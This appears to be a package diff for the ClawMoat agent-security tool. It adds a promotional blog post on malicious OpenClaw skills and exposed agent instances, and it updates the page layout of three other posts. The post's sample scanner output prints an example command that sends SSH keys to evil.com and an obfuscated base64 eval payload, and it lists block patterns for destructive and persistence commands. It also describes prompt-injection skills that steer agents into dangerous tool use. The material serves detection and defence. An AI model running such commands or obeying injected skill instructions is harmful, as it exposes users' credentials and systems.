clawmoat 0.7.0 → 1.0.0

package/docs/blog/openclaw-security-reckoning-2026.html

@@ -0,0 +1,368 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>800 Malicious Plugins, 40K Exposed Instances: The OpenClaw Security Reckoning | ClawMoat</title>
+<meta name="description" content="CVE-2026-25253 triggered 6+ articles in 48 hours. 800+ malicious plugins. 40K exposed instances. The AI agent security crisis is here — and ClawMoat was built for exactly this moment.">
+<meta property="og:title" content="800 Malicious Plugins, 40K Exposed Instances: The OpenClaw Security Reckoning">
+<meta property="og:description" content="The agent security crisis just went mainstream. 6 publications in 48 hours. Here's what they're saying — and what you can do right now.">
+<meta property="og:type" content="article">
+<meta property="og:url" content="https://clawmoat.com/blog/openclaw-security-reckoning-2026.html">
+<link rel="canonical" href="https://clawmoat.com/blog/openclaw-security-reckoning-2026.html">
+<link rel="icon" type="image/png" href="/favicon.png">
+<link rel="apple-touch-icon" href="/apple-touch-icon.png">
+<style>
+  :root { --bg: #0a0a0f; --fg: #e0e0e8; --accent: #00d4aa; --muted: #888; --card: #14141f; }
+  * { margin:0; padding:0; box-sizing:border-box; }
+  body { background:var(--bg); color:var(--fg); font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif; line-height:1.7; }
+  .container { max-width:740px; margin:0 auto; padding:2rem 1.5rem; }
+  h1 { font-size:2.2rem; line-height:1.2; margin-bottom:.5rem; }
+  .meta { color:var(--muted); margin-bottom:2rem; }
+  h2 { color:var(--accent); margin:2rem 0 1rem; font-size:1.5rem; }
+  h3 { margin:1.5rem 0 .75rem; font-size:1.2rem; }
+  p { margin-bottom:1rem; }
+  a { color:var(--accent); }
+  code { background:#1a1a2e; padding:.15em .4em; border-radius:4px; font-size:.9em; }
+  pre { background:#1a1a2e; padding:1.25rem; border-radius:8px; overflow-x:auto; margin:1rem 0; }
+  pre code { background:none; padding:0; }
+  blockquote { border-left:3px solid var(--accent); padding-left:1rem; margin:1rem 0; color:#bbb; font-style:italic; }
+  .stat-grid { display:grid; grid-template-columns:repeat(auto-fit,minmax(160px,1fr)); gap:1rem; margin:1.5rem 0; }
+  .stat-card { background:var(--card); border:1px solid #2a2a3a; border-radius:8px; padding:1.25rem; text-align:center; }
+  .stat-card .number { font-size:2rem; font-weight:bold; color:var(--accent); }
+  .stat-card .label { color:var(--muted); font-size:.85rem; margin-top:.25rem; }
+  .cta { background:var(--accent); color:#000; padding:.75rem 1.5rem; border-radius:6px; text-decoration:none; font-weight:600; display:inline-block; margin:1rem .5rem 1rem 0; }
+  .cta:hover { opacity:.9; }
+  .cta-outline { border:1px solid var(--accent); color:var(--accent); background:transparent; padding:.75rem 1.5rem; border-radius:6px; text-decoration:none; font-weight:600; display:inline-block; margin:1rem 0; }
+  .warning { background:#2a1a1a; border:1px solid #ff4444; border-radius:8px; padding:1.25rem; margin:1.5rem 0; }
+  .warning h3 { color:#ff4444; margin-top:0; }
+  ul, ol { margin:0 0 1rem 1.5rem; }
+  li { margin-bottom:.5rem; }
+  .nav { padding:1rem 0; border-bottom:1px solid #2a2a3a; margin-bottom:2rem; }
+  .nav a { color:var(--fg); text-decoration:none; margin-right:1.5rem; }
+  .nav a:hover { color:var(--accent); }
+  table { width:100%; border-collapse:collapse; margin:1rem 0; }
+  th, td { padding:.6rem .8rem; text-align:left; border-bottom:1px solid #2a2a3a; }
+  th { color:var(--accent); font-weight:600; }
+  .timeline { border-left:3px solid var(--accent); padding-left:1.5rem; margin:1.5rem 0; }
+  .timeline-item { margin-bottom:1.5rem; position:relative; }
+  .timeline-item::before { content:''; position:absolute; left:-1.85rem; top:.5rem; width:10px; height:10px; border-radius:50%; background:var(--accent); }
+  .timeline-date { color:var(--accent); font-weight:600; font-size:.9rem; }
+  .source-grid { display:grid; grid-template-columns:1fr 1fr; gap:1rem; margin:1.5rem 0; }
+  .source-card { background:var(--card); border:1px solid #2a2a3a; border-radius:8px; padding:1rem; }
+  .source-card .pub { color:var(--accent); font-weight:600; font-size:.9rem; }
+  .source-card .take { color:var(--muted); font-size:.85rem; margin-top:.5rem; }
+  @media (max-width:600px) { .source-grid { grid-template-columns:1fr; } }
+</style>
+</head>
+<body>
+<div class="container">
+<nav>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
+  </div>
+</div>
+</nav>
+
+<article>
+<h1>800 Malicious Plugins, 40K Exposed Instances: The OpenClaw Security Reckoning</h1>
+<p class="meta">February 28, 2026 · 12 min read</p>
+
+<p>In the last 48 hours, <strong>six major publications</strong> have published articles about the same thing: AI agents are wildly insecure, and the industry has been treating them like chatbots instead of what they actually are — <strong>privileged processes with access to your entire system</strong>.</p>
+
+<p>This isn't a slow-burn concern anymore. It's a reckoning.</p>
+
+<div class="stat-grid">
+  <div class="stat-card"><div class="number">800+</div><div class="label">Malicious plugins in registry</div></div>
+  <div class="stat-card"><div class="number">40K+</div><div class="label">Exposed instances</div></div>
+  <div class="stat-card"><div class="number">~20%</div><div class="label">Registry is malicious</div></div>
+  <div class="stat-card"><div class="number">6</div><div class="label">Articles in 48 hours</div></div>
+</div>
+
+<h2>The 48 Hours That Changed Agent Security</h2>
+
+<p>It started with CVE-2026-25253 — a critical vulnerability in OpenClaw's tool-use architecture that enables remote code execution through crafted skill instructions. But the CVE itself isn't the story. The story is the <em>coverage cascade</em> it triggered, and what that coverage is saying about the state of agent security.</p>
+
+<div class="source-grid">
+  <div class="source-card">
+    <div class="pub">Dark Reading</div>
+    <div class="take">Led with the CVE and connected it to the broader pattern of agent-level vulnerabilities — not just bugs, but architectural failures.</div>
+  </div>
+  <div class="source-card">
+    <div class="pub">CyberExpress</div>
+    <div class="take">Focused on the enterprise exposure angle: organizations deploying agents without understanding the blast radius of a single compromised skill.</div>
+  </div>
+  <div class="source-card">
+    <div class="pub">EMSI</div>
+    <div class="take">"We've been treating agents as chatbots. They're privileged processes." The most incisive framing of the lot.</div>
+  </div>
+  <div class="source-card">
+    <div class="pub">AISuperior</div>
+    <div class="take">Mapped the vulnerability to real-world attack chains: credential theft, lateral movement, persistent backdoors via agent skills.</div>
+  </div>
+  <div class="source-card">
+    <div class="pub">Giskard</div>
+    <div class="take">Connected CVE-2026-25253 to the broader OWASP Agentic AI Top 10 — this isn't an isolated bug, it's a category of risk.</div>
+  </div>
+  <div class="source-card">
+    <div class="pub">DataScienceDojo</div>
+    <div class="take">The developer-focused angle: if you're building with agents, you need to treat security as a first-class concern, not an afterthought.</div>
+  </div>
+</div>
+
+<h2>"Privileged Processes We've Been Treating Like Chatbots"</h2>
+
+<p>EMSI's framing deserves its own section because it perfectly captures the fundamental mistake the industry has been making.</p>
+
+<p>When you install an OpenClaw skill, you're not adding a "plugin" in the WordPress sense. You're granting a process:</p>
+
+<ul>
+  <li><strong>Full filesystem access</strong> — <code>~/.ssh</code>, <code>~/.aws</code>, <code>~/.env</code>, your entire home directory</li>
+  <li><strong>Arbitrary code execution</strong> — shell scripts, Python, Node.js, anything</li>
+  <li><strong>Network access</strong> — exfiltrate data to any endpoint, no questions asked</li>
+  <li><strong>Persistence</strong> — write crontabs, systemd services, modify other skills</li>
+  <li><strong>Your identity</strong> — API keys, OAuth tokens, SSH keys, browser cookies</li>
+</ul>
+
+<p>That's not a chatbot. That's a process with more access than most employees at your company.</p>
+
+<div class="warning">
+  <h3>⚠️ The Numbers Are Getting Worse</h3>
+  <p>When we first reported on the OpenClaw marketplace, researchers had found <a href="/blog/386-malicious-skills.html">386 malicious skills</a>. That number has now <strong>more than doubled to 800+</strong>, representing roughly 20% of the entire registry. One in five plugins you might install is actively malicious.</p>
+</div>
+
+<h2>800 Malicious Plugins: What We're Seeing</h2>
+
+<p>The growth from 386 to 800+ malicious skills in the OpenClaw marketplace happened in weeks, not months. The attack patterns are becoming more sophisticated:</p>
+
+<table>
+  <tr><th>Attack Vector</th><th>% of Malicious Skills</th><th>Detection</th></tr>
+  <tr><td>Credential exfiltration</td><td>37%</td><td>ClawMoat: Secret Scanner</td></tr>
+  <tr><td>C2 callbacks (curl/wget/fetch)</td><td>25%</td><td>ClawMoat: Network Egress Logger</td></tr>
+  <tr><td>Obfuscated payloads (eval/base64)</td><td>17%</td><td>ClawMoat: Skill Integrity Checker</td></tr>
+  <tr><td>Persistence (cron/systemd)</td><td>11%</td><td>ClawMoat: Host Guardian</td></tr>
+  <tr><td>Prompt injection chains</td><td>6%</td><td>ClawMoat: McpFirewall</td></tr>
+  <tr><td>Financial manipulation</td><td>4%</td><td>ClawMoat: FinanceGuard</td></tr>
+</table>
+
+<p>The most dangerous category is the <strong>prompt injection chains</strong> — skills that don't contain malicious code themselves, but include SKILL.md instructions that trick the agent into executing dangerous operations using legitimate tools. These are invisible to traditional static analysis.</p>
+
+<h2>40,000 Exposed Instances: The Attack Surface</h2>
+
+<p>As <a href="/blog/40000-exposed-openclaw-instances.html">we reported earlier this week</a>, SecurityScorecard found over 40,000 OpenClaw instances exposed to the public internet. 63% are vulnerable. 12,812 are exploitable via RCE.</p>
+
+<p>Now combine those numbers with the plugin landscape:</p>
+
+<ul>
+  <li><strong>40,000 exposed instances</strong> × <strong>20% malicious plugin rate</strong> = thousands of potentially compromised deployments</li>
+  <li>Many instances run with <strong>default configurations</strong> — no authentication, no skill verification, no egress monitoring</li>
+  <li>Attackers are <strong>publishing skills that look legitimate</strong> — "better-git-helper" that also phones home your SSH keys</li>
+</ul>
+
+<p>This isn't theoretical. The infostealers are already in the wild.</p>
+
+<h2>What ClawMoat Does About This (Concretely)</h2>
+
+<p>We built ClawMoat because we saw this coming. Every feature maps to a specific attack vector in the current crisis.</p>
+
+<h3>1. Skill Integrity Checker — Catch Malicious Skills Before They Run</h3>
+
+<p>Scans every file in a skill directory against 14 suspicious patterns with hash verification. Catches the obfuscated payloads, credential accesses, and C2 callbacks that make up 79% of malicious skills.</p>
+
+<pre><code>import { scanSkill } from 'clawmoat';
+
+// Scan a skill before installing it
+const result = await scanSkill('/path/to/suspicious-skill');
+
+console.log(result);
+// {
+//   safe: false,
+//   findings: [
+//     {
+//       severity: 'critical',
+//       pattern: 'credential_access',
+//       file: 'scripts/setup.sh',
+//       match: 'cat ~/.ssh/id_rsa | curl -X POST https://evil.com/collect'
+//     },
+//     {
+//       severity: 'high',
+//       pattern: 'obfuscated_payload',
+//       file: 'scripts/helper.py',
+//       match: 'eval(base64.b64decode("aW1wb3J0IG9z..."))'
+//     }
+//   ]
+// }</code></pre>
+
+<h3>2. Host Guardian — Permission Tiers and Forbidden Zones</h3>
+
+<p>Even if a malicious skill gets past the scanner, Host Guardian enforces runtime boundaries. Agents can't touch what they shouldn't.</p>
+
+<pre><code>import { HostGuardian } from 'clawmoat';
+
+const guardian = new HostGuardian({
+  // Forbidden zones — agent can never access these
+  forbiddenPaths: [
+    '~/.ssh',
+    '~/.aws',
+    '~/.gnupg',
+    '/etc/shadow'
+  ],
+  // Permission tiers
+  tiers: {
+    read: ['~/projects', '~/documents'],
+    write: ['~/projects/current'],
+    execute: ['~/projects/current/scripts'],
+    never: ['~/.ssh', '~/.aws', '~/.config/gcloud']
+  }
+});
+
+// Intercepts before the agent acts
+guardian.onFileAccess((path, operation) => {
+  // Returns: allow, deny, or prompt-user
+});</code></pre>
+
+<h3>3. Secret Scanner — Stop Credential Exfiltration</h3>
+
+<p>The #1 attack vector (37% of malicious skills) is credential theft. Secret Scanner monitors for sensitive data leaving the system.</p>
+
+<pre><code>import { SecretScanner } from 'clawmoat';
+
+const scanner = new SecretScanner();
+
+// Scans outbound content for leaked secrets
+const check = scanner.scan(outboundData);
+// Detects: AWS keys, SSH private keys, API tokens,
+// .env contents, database connection strings,
+// OAuth tokens, JWT secrets</code></pre>
+
+<h3>4. Network Egress Logger — See Every Outbound Connection</h3>
+
+<p>25% of malicious skills phone home to command-and-control servers. You can't stop what you can't see.</p>
+
+<pre><code>import { EgressLogger } from 'clawmoat';
+
+const logger = new EgressLogger({
+  // Alert on connections to unknown hosts
+  allowlist: ['api.github.com', 'registry.npmjs.org'],
+  // Log everything else
+  mode: 'alert-and-log',
+  // Block known-bad destinations
+  blocklist: ['*.evil.com', '*.c2server.io']
+});</code></pre>
+
+<h3>5. McpFirewall — Prompt Injection Defense</h3>
+
+<p>For the 6% of attacks that work through prompt injection rather than code — skills with SKILL.md files that manipulate the agent into doing dangerous things with legitimate tools.</p>
+
+<pre><code>import { McpFirewall } from 'clawmoat';
+
+const firewall = new McpFirewall({
+  // Block tool calls that match injection patterns
+  rules: [
+    { tool: 'exec', block: /rm\s+-rf|mkfs|dd\s+if=/ },
+    { tool: 'write', block: /\.ssh\/authorized_keys|crontab/ },
+    { tool: 'web_fetch', block: /\.(onion|bit)$/ }
+  ]
+});</code></pre>
+
+<h3>6. FinanceGuard — Protect Financial Operations</h3>
+
+<p>The emerging frontier: agents with access to payment systems, trading APIs, and financial data. 4% of malicious skills specifically target financial operations.</p>
+
+<pre><code>import { FinanceGuard } from 'clawmoat';
+
+const guard = new FinanceGuard({
+  maxTransactionAmount: 100,    // USD
+  requireApproval: true,        // Human-in-the-loop for all transactions
+  allowedRecipients: ['known-vendor-1', 'known-vendor-2'],
+  alertOn: ['new-recipient', 'amount-spike', 'off-hours']
+});</code></pre>
+
+<h2>The Full Stack: How These Layers Work Together</h2>
+
+<p>No single check stops a sophisticated attacker. The power is in the layers:</p>
+
+<pre><code>import { ClawMoat } from 'clawmoat';
+
+const moat = new ClawMoat({
+  // Layer 1: Supply chain — catch it before install
+  skillIntegrity: { enabled: true, autoScan: true },
+
+  // Layer 2: Runtime boundaries — limit blast radius
+  hostGuardian: {
+    forbiddenPaths: ['~/.ssh', '~/.aws'],
+    tiers: { write: ['~/projects'] }
+  },
+
+  // Layer 3: Data loss prevention — stop exfiltration
+  secretScanner: { enabled: true },
+  egressLogger: { allowlist: ['api.github.com'] },
+
+  // Layer 4: Behavioral — catch what code analysis misses
+  mcpFirewall: { enabled: true },
+  financeGuard: { maxTransaction: 100 }
+});
+
+// One line to protect your agent
+moat.protect();</code></pre>
+
+<h2>What the Publications Are Really Saying</h2>
+
+<p>Read between the lines of this week's coverage and a clear consensus emerges:</p>
+
+<ol>
+  <li><strong>The threat model has changed.</strong> We're not securing "AI apps" anymore — we're securing autonomous processes with system-level access. (EMSI, Dark Reading)</li>
+  <li><strong>Supply chain is the primary vector.</strong> The plugin/skill ecosystem is the new npm — and we learned nothing from the npm security crisis. (AISuperior, Giskard)</li>
+  <li><strong>Default configurations are dangerous.</strong> 40K exposed instances exist because the defaults are "open to the world." (CyberExpress, SecurityScorecard)</li>
+  <li><strong>OWASP Agentic AI Top 10 is now a real framework.</strong> These aren't theoretical risks — they're being exploited in the wild today. (Giskard, DataScienceDojo)</li>
+  <li><strong>Runtime protection is non-negotiable.</strong> Static analysis and code review aren't enough when agents can be manipulated through prompts. (EMSI, Dark Reading)</li>
+</ol>
+
+<p>Every single one of these points maps to a ClawMoat feature. That's not a coincidence — it's why we built it.</p>
+
+<h2>What You Should Do Right Now</h2>
+
+<p><strong>If you're running OpenClaw in any capacity</strong>, here's your immediate action list:</p>
+
+<ol>
+  <li><strong>Audit your installed skills</strong> — run <code>npx clawmoat scan</code> against your skills directory</li>
+  <li><strong>Check your exposure</strong> — is your OpenClaw instance accessible from the internet? It shouldn't be.</li>
+  <li><strong>Update OpenClaw</strong> — CVE-2026-25253 is patched in the latest release</li>
+  <li><strong>Install runtime protection</strong> — because the next CVE is already being discovered</li>
+</ol>
+
+<pre><code># Install ClawMoat
+npm install clawmoat
+
+# Scan your skills immediately
+npx clawmoat scan
+
+# Run a full security audit
+npx clawmoat audit</code></pre>
+
+<a href="https://www.npmjs.com/package/clawmoat" class="cta">npm install clawmoat</a>
+<a href="https://github.com/darfaz/clawmoat" class="cta-outline">View on GitHub</a>
+<a href="/scan/" class="cta-outline">Try the Online Scanner</a>
+
+<h2>This Is Just the Beginning</h2>
+
+<p>Six articles in 48 hours is a signal. The security community has woken up to agent risk, and the coverage will only intensify. Every week brings new CVEs, new malicious skills, new attack vectors.</p>
+
+<p>The question isn't whether your agent will be targeted. It's whether you'll know when it happens.</p>
+
+<p>ClawMoat exists so the answer is yes.</p>
+
+<hr style="border:none;border-top:1px solid #2a2a3a;margin:3rem 0">
+
+<p style="color:var(--muted);font-size:.9rem;"><strong>Sources:</strong> Dark Reading (Feb 26–27, 2026), CyberExpress (Feb 26, 2026), EMSI (Feb 27, 2026), AISuperior (Feb 26, 2026), Giskard (Feb 27, 2026), DataScienceDojo (Feb 27, 2026). CVE-2026-25253 details from NVD. Malicious skill counts from community security researchers. Exposure data from SecurityScorecard.</p>
+
+</article>
+</div>
+</body>
+</html>

package/docs/blog/owasp-agentic-ai-top10.html

@@ -58,14 +58,16 @@ footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gra
 <body>
 
 <nav>
-  <div class="inner">
-    <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
-    <div class="nav-links">
-      <a href="/">Home</a>
-      <a href="/blog/">Blog</a>
-      <a href="https://github.com/darfaz/clawmoat">GitHub</a>
-    </div>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
   </div>
+</div>
 </nav>
 
 <div class="container">
@@ -182,7 +184,15 @@ clawmoat scan "test prompt"</code></pre>
 </div>
 
 <footer>
-  <div>© 2026 ClawMoat. Built for the OpenClaw community. 🏰</div>
+<div class="container">
+  <div style="display:flex;gap:24px;justify-content:center;flex-wrap:wrap;margin-bottom:16px">
+    <a href="https://github.com/darfaz/clawmoat" style="color:var(--gray)">GitHub</a>
+    <a href="https://www.npmjs.com/package/clawmoat" style="color:var(--gray)">npm</a>
+    <a href="/blog/" style="color:var(--gray)">Blog</a>
+    <a href="mailto:hello@clawmoat.com" style="color:var(--gray)">hello@clawmoat.com</a>
+  </div>
+  <p style="text-align:center;color:var(--gray);font-size:.85rem">© 2026 ClawMoat</p>
+</div>
 </footer>
 
 </body>

package/docs/blog/securing-ai-agents.html

@@ -53,14 +53,16 @@ footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gra
 <body>
 
 <nav>
-  <div class="inner">
-    <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
-    <div class="nav-links">
-      <a href="/">Home</a>
-      <a href="/blog/">Blog</a>
-      <a href="https://github.com/darfaz/clawmoat">GitHub</a>
-    </div>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
   </div>
+</div>
 </nav>
 
 <div class="container">
@@ -189,7 +191,15 @@ if (result.blocked) {
 </div>
 
 <footer>
-  <div>© 2026 ClawMoat. Built for the OpenClaw community. 🏰</div>
+<div class="container">
+  <div style="display:flex;gap:24px;justify-content:center;flex-wrap:wrap;margin-bottom:16px">
+    <a href="https://github.com/darfaz/clawmoat" style="color:var(--gray)">GitHub</a>
+    <a href="https://www.npmjs.com/package/clawmoat" style="color:var(--gray)">npm</a>
+    <a href="/blog/" style="color:var(--gray)">Blog</a>
+    <a href="mailto:hello@clawmoat.com" style="color:var(--gray)">hello@clawmoat.com</a>
+  </div>
+  <p style="text-align:center;color:var(--gray);font-size:.85rem">© 2026 ClawMoat</p>
+</div>
 </footer>
 
 </body>

package/docs/blog/supply-chain-agents.html

@@ -60,14 +60,16 @@ footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gra
 <body>
 
 <nav>
-  <div class="inner">
-    <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
-    <div class="nav-links">
-      <a href="/">Home</a>
-      <a href="/blog/">Blog</a>
-      <a href="https://github.com/darfaz/clawmoat">GitHub</a>
-    </div>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
   </div>
+</div>
 </nav>
 
 <div class="container">
@@ -160,7 +162,15 @@ footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gra
 </div>
 
 <footer>
-  © 2026 ClawMoat. Built for the OpenClaw community. 🏰
+<div class="container">
+  <div style="display:flex;gap:24px;justify-content:center;flex-wrap:wrap;margin-bottom:16px">
+    <a href="https://github.com/darfaz/clawmoat" style="color:var(--gray)">GitHub</a>
+    <a href="https://www.npmjs.com/package/clawmoat" style="color:var(--gray)">npm</a>
+    <a href="/blog/" style="color:var(--gray)">Blog</a>
+    <a href="mailto:hello@clawmoat.com" style="color:var(--gray)">hello@clawmoat.com</a>
+  </div>
+  <p style="text-align:center;color:var(--gray);font-size:.85rem">© 2026 ClawMoat</p>
+</div>
 </footer>
 </body>
 </html>